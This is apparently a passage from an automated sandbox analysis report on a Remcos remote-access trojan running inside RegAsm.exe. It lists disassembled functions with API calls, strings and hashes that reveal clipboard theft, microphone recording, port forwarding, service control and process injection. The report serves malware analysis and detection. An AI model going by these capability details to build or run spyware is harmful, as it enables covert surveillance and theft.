                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                • String ID: !D@
                                                • API String ID: 2172192267-604454484
                                                • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 100059EA
                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                • _free.LIBCMT ref: 100059F6
                                                • _free.LIBCMT ref: 10005A01
                                                • _free.LIBCMT ref: 10005A0C
                                                • _free.LIBCMT ref: 10005A17
                                                • _free.LIBCMT ref: 10005A22
                                                • _free.LIBCMT ref: 10005A2D
                                                • _free.LIBCMT ref: 10005A38
                                                • _free.LIBCMT ref: 10005A43
                                                • _free.LIBCMT ref: 10005A51
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 004481B5
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 004481C1
                                                • _free.LIBCMT ref: 004481CC
                                                • _free.LIBCMT ref: 004481D7
                                                • _free.LIBCMT ref: 004481E2
                                                • _free.LIBCMT ref: 004481ED
                                                • _free.LIBCMT ref: 004481F8
                                                • _free.LIBCMT ref: 00448203
                                                • _free.LIBCMT ref: 0044820E
                                                • _free.LIBCMT ref: 0044821C
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Eventinet_ntoa
                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                • API String ID: 3578746661-3604713145
                                                • Opcode ID: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                                                • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                • Opcode Fuzzy Hash: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                                                • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer
                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                • API String ID: 3527080286-3064271455
                                                • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                • API String ID: 1462127192-2001430897
                                                • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentProcess
                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                • API String ID: 2050909247-4242073005
                                                • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                Download Yara Rule
                                                APIs
                                                • _strftime.LIBCMT ref: 00401D50
                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                • API String ID: 3809562944-243156785
                                                • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                • int.LIBCPMT ref: 00410EBC
                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                • String ID: ,kG$0kG
                                                • API String ID: 3815856325-2015055088
                                                • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                • waveInStart.WINMM ref: 00401CFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                • String ID: dMG$|MG$PG
                                                • API String ID: 1356121797-532278878
                                                • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                • DispatchMessageA.USER32(?), ref: 0041D584
                                                • GetMessageA.USER32 ref: 0041D591
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                • String ID: Remcos
                                                • API String ID: 1970332568-165870891
                                                • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                • __freea.LIBCMT ref: 00454083
                                                • __freea.LIBCMT ref: 0045408F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                • String ID:
                                                • API String ID: 201697637-0
                                                • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                • _free.LIBCMT ref: 00445515
                                                • _free.LIBCMT ref: 0044552E
                                                • _free.LIBCMT ref: 00445560
                                                • _free.LIBCMT ref: 00445569
                                                • _free.LIBCMT ref: 00445575
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                • String ID: C
                                                • API String ID: 1679612858-1037565863
                                                • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: tcp$udp
                                                • API String ID: 0-3725065008
                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                • ExitThread.KERNEL32 ref: 004018F6
                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                • String ID: PkG$XMG$NG$NG
                                                • API String ID: 1649129571-3151166067
                                                • Opcode ID: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                • Opcode Fuzzy Hash: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                • MoveFileW.KERNEL32 ref: 00407AA5
                                                • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                • String ID: .part
                                                • API String ID: 1303771098-3499674018
